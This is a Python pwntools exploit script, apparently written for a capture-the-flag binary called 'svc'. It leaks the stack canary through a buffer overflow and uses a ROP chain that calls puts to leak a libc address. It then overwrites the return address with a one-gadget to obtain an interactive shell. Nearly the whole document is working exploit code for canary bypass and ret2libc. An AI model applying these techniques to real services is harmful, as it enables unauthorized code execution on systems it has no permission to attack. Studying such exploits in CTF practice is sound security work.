pwntoolstemplate

#!/usr/bin/python3.7

from pwn import *
#context.terminal = ['tmux', 'splitw', '-h']
context.terminal = ['/usr/bin/tilix', '-a', 'session-add-right', '-e' ]
context.arch = 'amd64'
context.bits = 64

chal = './svc'
libc = '/lib/x86_64-linux-gnu/libc.so.6'
gdbscript = """br * 0x400ddf
c
"""

#p = process(chal)
#gdb.attach(p, gdbscript)
p = gdb.debug(chal, gdbscript)

e = ELF(chal)
l = ELF(libc)

def feed(food):
    p.sendlineafter('>>', '1')
    p.sendlineafter('>>', food)

def review():
    p.sendlineafter('>>', '2')
    p.recvuntil('[*]PLEASE TREAT HIM WELL.....\n-------------------------\n')
    return p.recvuntil('-------------------------\n[*]SCV GOOD TO GO,SIR....\n')

def mine():
    p.sendlineafter('>>', '3')
    p.recvline()

#leak canary by overriding null byte and printing
feed(b'A'*168)
canary = review().split(b'\n')[1]
canary = b'\x00' + canary[0:7]
log.info('leaked canary: ')
log.info(canary)

#0x0000000000400ea3: pop rdi; ret;
poprdi = 0x400ea3

#rop manuell
#rop = b''
#rop += p64(poprdi)
#rop += p64(e.got['puts'])
#rop += p64(e.symbols['puts'])
#rop += p64(0x400a96) # main

#rop pwntools
rop = ROP(e)
rop.puts(e.got['puts'])
rop.call(0x400a96)
log.info(rop.dump())
rop = rop.chain()

#send libc leak
feed(b'A'*168 + canary + b'CCCCCCCC' + rop)
mine()
putsleak = p.recvline()[:-1]
log.info('Puts Leak:')
log.info(putsleak)
putsleak = u64(putsleak + b'\x00'*(8-len(putsleak)))
system = putsleak - l.symbols['puts'] + l.symbols['system']
libcbase = putsleak - l.symbols['puts']
binsh = putsleak - l.symbols['puts'] + next(l.search(b'/bin/sh\x00'))
oneg = putsleak - l.symbols['puts'] + 0x10afa9
log.info('system:')
log.info(hex(system))

#exploit rop manuell (not working)
#rop = b''
#rop += p64(poprdi)
#rop += p64(binsh)
#rop += p64(system)

l.address = libcbase
rop = ROP(l)
rop.system(next(l.search(b'/bin/sh\x00')))
log.info(rop.dump())
rop = rop.chain()

feed(b'A'*168 + canary + b'CCCCCCCC' + p64(oneg))
#feed(b'A'*168 + canary + b'CCCCCCCC' + rop)
mine()
p.interactive()